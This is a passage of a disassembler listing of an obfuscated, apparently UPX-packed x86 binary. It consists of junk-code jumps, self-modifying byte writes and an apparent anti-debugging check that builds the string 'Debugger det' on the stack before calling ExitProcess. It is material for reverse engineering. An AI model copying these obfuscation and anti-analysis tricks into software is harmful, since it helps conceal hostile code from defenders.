; ---------------------------------------------------------------------------
db 2 dup(0), 2Fh ; CODE XREF: fzj3qwht:loc_431720�j
dd 6800FF9h, 0E8FFFFFFh, 2C1Eh
; ---------------------------------------------------------------------------
locret_42FACC: ; CODE XREF: fzj3qwht:00431896�j
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_42FACF: ; CODE XREF: fzj3qwht:loc_43128E�j
jmp loc_4318C9
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EB56
loc_42FAD6: ; CODE XREF: sub_42EB56:loc_4324E3�j
and esi, 4716E5DCh
add esi, 0A5E7B023h
jnb near ptr loc_43261D+5
; END OF FUNCTION CHUNK FOR sub_42EB56
; ---------------------------------------------------------------------------
dd 0EA330000h, 22A8E9h, 87000000h, 815E2434h, 1384F2C0h
dd 0E9008B62h, 26A6h
db 0
; ---------------------------------------------------------------------------
loc_42FB05: ; CODE XREF: fzj3qwht:0042ED6E�j
jl near ptr dword_42E794+8
add [ebx], bh
jmp near ptr 2F7BFBh
; ---------------------------------------------------------------------------
inc dword ptr [eax]
add bl, al
xchg edx, [ebx]
jmp sub_430C13
; ---------------------------------------------------------------------------
align 2
locret_42FB1E: ; CODE XREF: fzj3qwht:00430847�j
retn
; ---------------------------------------------------------------------------
align 10h
db 0, 0FFh, 0D0h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431686
loc_42FB23: ; CODE XREF: sub_431686-2A3D�j
; fzj3qwht:loc_4316B5�j
push (offset loc_431AE0+1)
jmp loc_431A12
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430F48
loc_42FB2D: ; CODE XREF: sub_430F48:loc_43167B�j
mov edi, eax
xchg edi, [esp+0]
call near ptr dword_42E8AC+15h
imul eax, [eax], 0F68FE900h
; END OF FUNCTION CHUNK FOR sub_430F48
; ---------------------------------------------------------------------------
db 2 dup(0FFh), 0E8h
; ---------------------------------------------------------------------------
retf 0FFFEh
; ---------------------------------------------------------------------------
db 0FFh
dd 0EA5E8h, 0F000000h, 0FFFCD08Dh, 0D61B00FFh, 9E3C158h
dd 0DB81F503h, 63B5A574h, 0FFFCBCE9h, 870000FFh, 0FF5F243Ch
dd 42A0C015h, 147BE900h, 0
; ---------------------------------------------------------------------------
jmp loc_431E94
; ---------------------------------------------------------------------------
align 2
push eax
mov eax, offset loc_43122D
jmp loc_432467
; ---------------------------------------------------------------------------
align 2
push 0BAB1DE92h
jmp loc_430307
; ---------------------------------------------------------------------------
dd 0E7810000h, 7645C2F7h, 0EC14D981h, 0DEE965F6h
db 20h, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_42FBA7: ; CODE XREF: sub_42F4AE+2A00�j
cdq
xor ebx, edi
jmp loc_42FDFB
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
loc_42FBAF: ; DATA XREF: sub_42FA52+1D8A�o
add esi, ebp
push ecx
mov ecx, offset byte_431907
jmp loc_42ED96
; ---------------------------------------------------------------------------
dd 14870000h, 5A595224h, 8B241C87h, 27EE9EBh, 0
dword_42FBD0 dd 21E8595Eh, 8BFFFFEAh, 0C38B5010h, 68240487h, 55798B1h
; DATA XREF: fzj3qwht:0042ED39�o
dd 0FFF912E9h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_42FBEB: ; CODE XREF: sub_42F4AE+95D�j
xor edx, 2F565DD7h
xchg edx, [esp-0Ch+arg_8]
lea eax, [ebp-81h]
push ebx
push eax
pop ebx
adc al, 1Ch
and al, 0E9h
xchg dh, dh
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
db 0FFh
dd 990000FFh, 0C257C581h, 0C2E93627h, 0FFFFF0h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301B7
loc_42FC14: ; CODE XREF: sub_4301B7-1496�j
add ecx, 50B0E746h
popf
cdq
call sub_42ED87
; END OF FUNCTION CHUNK FOR sub_4301B7
; ---------------------------------------------------------------------------
db 2 dup(0), 0C3h
dd 14870000h, 4875A24h, 0C88B5124h, 9C240C87h, 15D5E9h
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_42FC3B proc near ; CODE XREF: fzj3qwht:0042F7C5�j
; fzj3qwht:0043229B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
; FUNCTION CHUNK AT 004307B9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00430878 SIZE 00000009 BYTES
xchg ecx, [esp+0]
pop ecx
lea eax, nullsub_139
mov byte ptr [eax], 0C3h
call near ptr loc_4304D8+1
rol edx, 15h
jmp loc_4307B9
sub_42FC3B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
loc_42FC56: ; CODE XREF: fzj3qwht:00431993�j
mov byte ptr [edx], 57h
pop edx
pop esi
push esi
mov esi, ebp
xchg esi, [esp]
pop ebx
in al, dx
push eax
jmp loc_4302C3
; ---------------------------------------------------------------------------
align 2
xchg ebp, [esp]
push 3438DB61h
xchg ebp, [esp]
mov esi, ebp
pop ebp
add esi, 0C225606h
jmp loc_431F0A
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301AC
loc_42FC85: ; CODE XREF: sub_4301AC+1BD3�j
jl loc_431CC5
; END OF FUNCTION CHUNK FOR sub_4301AC
; ---------------------------------------------------------------------------
db 0
dd 1C860F00h, 0E9000024h, 2028h, 0B78D0F00h, 0E9FFFFEFh
dd 0FFFFF6D5h, 3C870000h, 45C65F24h, 45FF2DE0h, 1B6FE8F0h
dd 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_42FCB8: ; CODE XREF: sub_42F4AE:loc_432243�j
pop edx
xchg ebx, [esp-0Ch+arg_8]
push ebx
pop ebp
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_432090
loc_42FCC1: ; CODE XREF: sub_432090+B�j
jmp loc_42FDEC
; END OF FUNCTION CHUNK FOR sub_432090
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_42FCC8 proc near ; CODE XREF: sub_4309EE+4�p
; fzj3qwht:loc_431113�j
push 131AFD00h
jmp near ptr dword_42EDF4+21h
sub_42FCC8 endp
; ---------------------------------------------------------------------------
dw 9900h
; ---------------------------------------------------------------------------
xchg edi, [esp]
pop edi
jmp loc_4322FE
; ---------------------------------------------------------------------------
xchg esi, [esp]
push eax
jmp loc_431C47
; ---------------------------------------------------------------------------
dw 300h
db 0DDh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431452
loc_42FCE9: ; CODE XREF: sub_431452-1114�j
add ebx, 3195D621h
db 64h
add ebp, eax
mov esi, ebp
; END OF FUNCTION CHUNK FOR sub_431452
; ---------------------------------------------------------------------------
dd 0FFFFh, 42F00268h, 0F9A0E900h
db 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_142. PRESS KEYPAD "+" TO EXPAND]
align 4
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430E27
loc_42FD05: ; CODE XREF: sub_430E27+9�j
jmp loc_42F7CC
; END OF FUNCTION CHUNK FOR sub_430E27
; ---------------------------------------------------------------------------
dw 0E900h
dd 64Bh, 879D3F8Bh, 9C51243Ch, 0A274868h, 96E9594Ch, 87000002h
dd 0C65B241Ch, 34879D02h, 5ED68B24h, 9302E881h, 0C0C1DE75h
dd 0ADBE919h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FF6B
loc_42FD40: ; CODE XREF: sub_42FF6B:loc_431630�j
mov esi, offset loc_42FE11
jmp loc_42EFB2
; END OF FUNCTION CHUNK FOR sub_42FF6B
; ---------------------------------------------------------------------------
mov byte ptr [eax], 87h
pop eax
pop edx
or edx, 3E95D7B0h
sub edx, 6407E5BDh
add edx, 0EF58EF1h
jmp loc_430758
; ---------------------------------------------------------------------------
align 4
dd 870F03C6h, 0DE8B2434h, 0FB8BE95Eh, 5F00FFFFh, 811AC7C1h
dd 73D044E7h, 9B46848h, 80E90043h, 2, 0E9FE8500h, 0FFFFEDD7h
; ---------------------------------------------------------------------------
loc_42FD94: ; DATA XREF: fzj3qwht:004311AB�o
push 5F2BA5EBh
xchg ebp, [esp]
mov edi, ebp
pop ebp
sub edi, 2CAFB784h
or edi, 896749B1h
jmp loc_4321A3
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_42FDB1: ; DATA XREF: fzj3qwht:loc_42F9D9�o
add ecx, ebp
add ecx, 12FE9F75h
mov [ecx], eax
xchg edi, [esp]
mov ecx, edi
pop edi
jmp loc_43038B
; ---------------------------------------------------------------------------
align 4
locret_42FDC8: ; CODE XREF: fzj3qwht:00432314�j
retn
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 60Bh, 0D33E9h, 0CA6E900h, 0
dd 5E243487h, 8AFC458Bh, 0FB86E900h, 0FFFFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_432090
loc_42FDEC: ; CODE XREF: sub_432090:loc_42FCC1�j
; DATA XREF: sub_42F4AE+F8�o
jbe short loc_42FDF2
and al, 8Bh
in al, dx
push edi
loc_42FDF2: ; CODE XREF: sub_432090:loc_42FDEC�j
mov edi, ecx
call near ptr dword_42F43C+1Fh
; END OF FUNCTION CHUNK FOR sub_432090
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_42FDFB: ; CODE XREF: sub_42F4AE+6FC�j
xchg edx, [esp-0Ch+arg_8]
pop edx
loc_42FDFF: ; CODE XREF: sub_42F4AE:loc_431EA6�j
push 75B3917Ch
pop edx
sub edx, 465D33A5h
jmp loc_42FBEB
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_42FE11: ; DATA XREF: sub_42FF6B:loc_42FD40�o
sub [ebp-1459h], al
push offset loc_431446
jmp loc_430C36
; ---------------------------------------------------------------------------
align 2
word_42FE22 dw 0F9F7h ; DATA XREF: sub_42ED87+4�o
dd 0FBA3800Fh, 0BB53FFFFh, 4300E7h, 0FFF9C3E9h, 0C30000FFh
dd 55E90000h, 1
db 0
; ---------------------------------------------------------------------------
locret_42FE41: ; CODE XREF: fzj3qwht:00430191�j
retn
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FA52
loc_42FE43: ; CODE XREF: fzj3qwht:loc_430130�j
; sub_42FA52+1EE4�j
jmp loc_4320C3
; END OF FUNCTION CHUNK FOR sub_42FA52
; ---------------------------------------------------------------------------
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_154. PRESS KEYPAD "+" TO EXPAND]
align 4
jmp loc_42F1C9
; ---------------------------------------------------------------------------
db 2 dup(0), 87h ; CODE XREF: fzj3qwht:004307A8�p
; ---------------------------------------------------------------------------
xor al, 24h
pop esi
call ds:dword_42A0C0 ; ExitProcess
jmp locret_43201D
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431410
loc_42FE63: ; CODE XREF: sub_431410+E�j
; fzj3qwht:loc_431E94�j
lea eax, dword_42E868+6
call sub_4322DA
add dh, al
push es
pushf
xchg edx, [esp+8+var_8]
mov esi, edx
pop edx
jmp loc_4320F3
; END OF FUNCTION CHUNK FOR sub_431410
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_42FE7E: ; CODE XREF: sub_42F4AE:loc_42F53C�j
pop edx
sub edx, 0D7453485h
or edx, 4464E393h
js near ptr dword_42EC68+26h
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
db 2 dup(0), 1Bh
dd 0E9FD8BF2h, 1064h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FF32
loc_42FE9D: ; CODE XREF: sub_42FF32:loc_4326CE�j
mov byte ptr [edx], 8Bh
pop edx
add eax, ebp
add eax, 20790CFAh
; END OF FUNCTION CHUNK FOR sub_42FF32
; ---------------------------------------------------------------------------
db 82h, 0
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_144. PRESS KEYPAD "+" TO EXPAND]
dw 0FFEFh
; ---------------------------------------------------------------------------
inc dword ptr [eax]
mov ebx, [ecx]
jmp loc_430F45
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431686
loc_42FEB9: ; CODE XREF: sub_431686-233F�j
mov byte ptr [ecx], 9Ch
pop ecx
push esi
push 0CD222F4Eh
pop esi
or esi, 2FECD5AEh
jmp loc_43095D
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42FED0 proc near ; CODE XREF: sub_431686:loc_43144D�p
xchg edx, [esp+0]
pop edx
dec dword ptr [ebp-10h]
cmp dword ptr [ebp-10h], 0
jmp near ptr dword_42EA44+0ACh
sub_42FED0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42FEE0: ; CODE XREF: fzj3qwht:0043264F�j
push offset loc_430092
jmp loc_432430
; ---------------------------------------------------------------------------
align 4
loc_42FEEC: ; CODE XREF: fzj3qwht:00431F7F�j
push offset byte_42FA6D
jmp locret_430E95
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EE90
loc_42FEF6: ; CODE XREF: sub_42EE90+4�j
xor ebx, 9F2302C0h
call sub_42F4AE
; END OF FUNCTION CHUNK FOR sub_42EE90
; ---------------------------------------------------------------------------
db 2 dup(0), 50h
; =============== S U B R O U T I N E =======================================
sub_42FF04 proc near ; CODE XREF: fzj3qwht:004328DF�p
; FUNCTION CHUNK AT 0043019F SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
pushf
push 0A5760C23h
pop eax
push esi
jmp loc_43019F
sub_42FF04 endp
; ---------------------------------------------------------------------------
db 87h, 0Ch, 24h
dd 6C65F59h, 0F889E98Bh, 0C300FFFFh, 85E90000h, 22h, 0FFFC1AE9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; =============== S U B R O U T I N E =======================================
sub_42FF32 proc near ; CODE XREF: fzj3qwht:loc_431270�p
; fzj3qwht:004316F7�j
; FUNCTION CHUNK AT 0042FE9D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004326CE SIZE 00000005 BYTES
xchg edi, [esp+0]
xchg ebx, [esp+0]
mov edi, ebx
pop ebx
jmp loc_4326CE
sub_42FF32 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_153. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0), 0Fh
dd 22E68Dh, 0FB850000h, 12FE9h
db 2 dup(0)
; ---------------------------------------------------------------------------
locret_42FF52: ; CODE XREF: fzj3qwht:0042EE9F�j
retn
; ---------------------------------------------------------------------------
db 87h
dd 0CB8B241Ch, 240C875Bh, 6859F18Bh, 4304B1h, 0FFEA79E9h
db 0FFh, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_42FF6B proc near ; DATA XREF: sub_4316FE-1D87�o
var_24 = dword ptr -24h
; FUNCTION CHUNK AT 0042EFB2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FD40 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00431630 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432476 SIZE 0000000D BYTES
add esp, 0FFFFFFE0h
push edx
mov edx, esi
xchg edx, [esp+24h+var_24]
jmp loc_431630
sub_42FF6B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_132. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431167
loc_42FF7C: ; CODE XREF: sub_431167+16BF�j
jmp nullsub_100
; END OF FUNCTION CHUNK FOR sub_431167
; ---------------------------------------------------------------------------
db 81h, 0C0h, 92h
dd 5162EF0Ah, 0C87C88Bh, 0E91CE924h, 0FFFFh, 585BD38Bh
dd 7710F081h, 0C881DA36h, 0B4728397h, 0D525F081h, 0C59EF60Dh
dd 228AE951h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43098E
loc_42FFB2: ; CODE XREF: sub_43098E:loc_430513�j
call sub_430218
; END OF FUNCTION CHUNK FOR sub_43098E
; ---------------------------------------------------------------------------
db 0
dd 1698E900h, 0C3000000h, 0FA48E900h, 0EEE8FFFFh, 5, 0E90BEFC1h
dd 0FFFFF349h, 0E9DA0300h, 1F5Ch
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_42FFDE proc near ; CODE XREF: fzj3qwht:0042ED34�p
; FUNCTION CHUNK AT 004317CC SIZE 0000000A BYTES
xchg ebx, [esp+0]
pop ebx
add eax, 680AA673h
mov eax, [eax]
jmp loc_4317CC
sub_42FFDE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
dd 0D8FB8100h, 0E9846517h, 0FFFFFF30h, 36E6DD81h, 0EE23B3C6h
; CODE XREF: sub_431F38+35A�j
dd 0DA4E9h, 0C3000000h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_43000C: ; CODE XREF: sub_42F4AE+1ABB�j
jmp nullsub_156
; END OF FUNCTION CHUNK FOR sub_42F4AE
; =============== S U B R O U T I N E =======================================
sub_430011 proc near ; CODE XREF: fzj3qwht:loc_430198�p
; fzj3qwht:004317EE�j
xchg esi, [esp+0]
pop esi
add edx, 30B98DAFh
call sub_43241A
jmp nullsub_148
sub_430011 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431167
loc_430025: ; CODE XREF: sub_431167-2246�j
jmp loc_43281C
; END OF FUNCTION CHUNK FOR sub_431167
; ---------------------------------------------------------------------------
dw 0C300h
; ---------------------------------------------------------------------------
loc_43002C: ; DATA XREF: sub_43060A+8�o
push 84B15035h
pop eax
and eax, 73D25872h
test eax, 100h
jmp loc_4321CF
; ---------------------------------------------------------------------------
loc_430043: ; CODE XREF: fzj3qwht:0042F9FF�j
call loc_430274
; ---------------------------------------------------------------------------
db 0, 8Bh, 55h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43005C
loc_43004B: ; CODE XREF: sub_43005C+4�j
add [ecx+9AEE930h], cl
; END OF FUNCTION CHUNK FOR sub_43005C
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 2F8F0F00h, 81000018h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43005C proc near ; DATA XREF: UPX1:0041A720�o
; FUNCTION CHUNK AT 0042EEC6 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043004B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00431CDC SIZE 00000005 BYTES
enter 0FFFFF787h, 5Ah
loope loc_43004B
mov ebp, 0C3000026h ; CODE XREF: fzj3qwht:loc_4318F3�j
add [edi+565B241Ch], al
push 80912A91h
pop esi
or esi, 3FEFB36Fh
jmp loc_431CDC
sub_43005C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
dd 2347880Fh, 0CDC10000h, 9C1C10Dh, 0FFE88DE9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
loc_430092: ; DATA XREF: fzj3qwht:loc_42FEE0�o
push ecx
push 549F42E7h
pop esi
sub esi, 0CDB8736Dh
test esi, 10h
jmp loc_431B81
; ---------------------------------------------------------------------------
align 4
dd 7A8840Fh, 0CAE80000h, 14h, 31870F00h, 0E9000028h, 558h
dd 0B993C381h, 8CE9F1D3h, 12h
db 0
; ---------------------------------------------------------------------------
loc_4300D1: ; CODE XREF: fzj3qwht:0043133B�j
or eax, 9C3DC8D9h
xor eax, 3BB45026h
add eax, ebp
add eax, 7B366111h
mov eax, [eax]
mov cl, 54h
add eax, 0F8458BE0h
mov ecx, 0Ah
jmp loc_43018B
; ---------------------------------------------------------------------------
dd 58D0000h, 4322E8h, 42F50F68h, 470E900h, 0
dd 75E9C23Bh, 0FFFFEDh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_156. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0), 87h
dd 0B5E90055h, 14h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_430121: ; CODE XREF: sub_42F4AE+32C2�j
push offset loc_4325F3
jmp nullsub_151
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
locret_43012D: ; CODE XREF: fzj3qwht:0042EFFC�j
retn
; ---------------------------------------------------------------------------
align 10h
loc_430130: ; CODE XREF: fzj3qwht:0042F3C6�j
jbe loc_42FE43
cdq
jmp near ptr dword_42EB78+78h
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C13
loc_43013E: ; CODE XREF: sub_430C13:loc_431C41�j
call sub_430E46
loc_430143: ; DATA XREF: fzj3qwht:00430842�o
mov edx, [eax]
push ebx
push 4C281044h
pop ebx
or ebx, 0F0022C0Ch
push offset loc_430A2B
jmp nullsub_160
; END OF FUNCTION CHUNK FOR sub_430C13
; ---------------------------------------------------------------------------
dd 0EBE95B00h, 0Fh
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4309EE
loc_430165: ; CODE XREF: sub_4309EE+C�j
xchg eax, [esp+0]
mov edx, offset byte_432013
jmp near ptr dword_42E8AC+32h
; END OF FUNCTION CHUNK FOR sub_4309EE
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_430173: ; CODE XREF: fzj3qwht:loc_4313EB�j
pushf
jmp loc_43140E
; ---------------------------------------------------------------------------
db 2 dup(0), 8Bh
dd 58880F11h, 0E9000012h, 0FFFFE655h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43018A: ; DATA XREF: sub_4301B7:loc_42FA8F�o
popf
loc_43018B: ; CODE XREF: fzj3qwht:004300F3�j
cdq
push offset byte_432693
jmp locret_42FE41
; ---------------------------------------------------------------------------
align 4
loc_430198: ; CODE XREF: fzj3qwht:loc_4326D5�j
call sub_430011
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FF04
loc_43019F: ; CODE XREF: sub_42FF04+C�j
jmp near ptr dword_42EDF4+15h
; END OF FUNCTION CHUNK FOR sub_42FF04
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_150. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0), 0E9h
dd 0FFFFE6C0h
; =============== S U B R O U T I N E =======================================
sub_4301AC proc near ; DATA XREF: fzj3qwht:0042EDBF�o
; FUNCTION CHUNK AT 0042FC85 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00430C2F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043138D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004315EA SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00431604 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431CC5 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00431D68 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00431DA4 SIZE 0000002A BYTES
push ebx
mov ebx, offset byte_4308B9
jmp loc_431D68
sub_4301AC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4301B7 proc near ; DATA XREF: sub_42F4AE+116�o
; FUNCTION CHUNK AT 0042EA10 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042ED0A SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042FA8F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042FC14 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00430EA7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043164B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004324AA SIZE 00000005 BYTES
add eax, 8C484A52h
adc [eax], eax
loc_4301BF: ; DATA XREF: fzj3qwht:0042EE31�o
nop
push 0FAE3D3F1h
pop ecx
and ecx, 66372017h
xor ecx, 8104DBC0h
jmp loc_4324AA
sub_4301B7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
xchg edi, [esp]
pop edi
push 8A6E7AD1h
pop eax
add eax, 532825A8h
call sub_430A5C
loc_4301ED: ; CODE XREF: fzj3qwht:loc_431635�j
mov byte ptr [edx], 8Ah
pop edx
push 0C0640AD8h
pop eax
or eax, 0B2196807h
jmp loc_430A7B
; ---------------------------------------------------------------------------
dw 487h
dd 240C8724h, 8159C18Bh, 0E21961C0h, 0E9C50365h, 0FFFFF17Dh
; =============== S U B R O U T I N E =======================================
sub_430218 proc near ; CODE XREF: sub_43098E:loc_42FFB2�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004305FD SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
xchg ebx, [esp-4+arg_0]
mov edx, ebx
pop ebx
mov dword ptr [ebp-81h], 75626544h
mov dword ptr [ebp-7Dh], 72656767h
mov dword ptr [ebp-79h], 74656420h
jmp loc_4305FD
sub_430218 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
dd 0E9007D8Bh, 0FFFFEE2Ch
; ---------------------------------------------------------------------------
loc_430248: ; CODE XREF: fzj3qwht:00431ECC�j
push offset sub_43193B
jmp near ptr loc_431976+1
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
dword_430254 dd 0FFE5B0E9h ; CODE XREF: fzj3qwht:00431ACE�j
; ---------------------------------------------------------------------------
inc dword ptr [eax]
loc_43025A: ; CODE XREF: fzj3qwht:0042FA67�j
jmp loc_4311A6
; ---------------------------------------------------------------------------
align 10h
jno loc_42E8EE
pop eax
jmp sub_431686
; ---------------------------------------------------------------------------
dd 8D0F0000h, 0D0Ah
; ---------------------------------------------------------------------------
loc_430274: ; CODE XREF: fzj3qwht:loc_430043�p
xchg eax, [esp]
pop eax
mov byte ptr [eax], 87h
pop eax
call sub_4313F1
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0FFFFF210h, 0ECFDE900h, 9C00FFFFh, 74454E68h, 0C0815816h
dd 105B4972h, 0B710F081h, 0E957330Ch, 0FFFFEB23h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4312D7
loc_4302A9: ; CODE XREF: sub_4312D7:loc_42F7B5�j
pop edi
sub eax, 698147CDh
and eax, 0E353CA1h
xor eax, 0E188CF2Dh
jmp loc_431B2E
; END OF FUNCTION CHUNK FOR sub_4312D7
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_4302C3: ; CODE XREF: fzj3qwht:0042FC64�j
mov eax, edx
xchg eax, [esp]
push ecx
pop edx
xchg edx, [esp]
push esi
jmp loc_432601
; ---------------------------------------------------------------------------
align 4
dd 9D685300h, 0E900430Fh, 21FDh
db 0
; ---------------------------------------------------------------------------
loc_4302E1: ; CODE XREF: fzj3qwht:loc_432833�j
mov byte ptr [esi], 0C3h
pop esi
push offset loc_432196
jmp near ptr byte_42F6BD+2
; ---------------------------------------------------------------------------
push ecx
pushf
jmp sub_42F188
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_4316FE
loc_4302F8: ; CODE XREF: sub_4316FE+10�j
mov byte ptr [esi], 0FFh
pop esi
popf
xchg edx, [esp-4+arg_0]
jmp loc_431965
; END OF FUNCTION CHUNK FOR sub_4316FE
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_430307: ; CODE XREF: fzj3qwht:0042FB8F�j
xchg ecx, [esp]
pop ecx
push ecx
mov ecx, esi
jmp loc_4319D8
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_430315 proc near ; CODE XREF: fzj3qwht:0042EA2C�j
; sub_4301AC:loc_431D68�p
arg_0 = dword ptr 4
xchg esi, [esp+0]
pop esi
mov byte ptr [ebx], 8Dh
xchg eax, [esp-4+arg_0]
jmp loc_42F05F
sub_430315 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0FF9E800h, 0E9000000h, 0A39h, 0ED15E900h, 0FFFFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431452
loc_430338: ; CODE XREF: sub_431452-EA5�j
jge loc_4325F3
jnp loc_42FCE9
add edx, 0A12DD8FBh
and eax, 0EDF45F2Fh
push offset loc_432322
jmp nullsub_131
; END OF FUNCTION CHUNK FOR sub_431452
; ---------------------------------------------------------------------------
dw 6800h
; ---------------------------------------------------------------------------
mov ss, word ptr [edi]
inc ebx
add cl, ch
nop
idiv bh
loc_430364: ; DATA XREF: fzj3qwht:loc_42F2E4�o
inc dword ptr [edi-2DF6DBFCh]
jz loc_4311F5
push edx
push 0DFA610CAh
pop edx
jmp loc_43108F
; ---------------------------------------------------------------------------
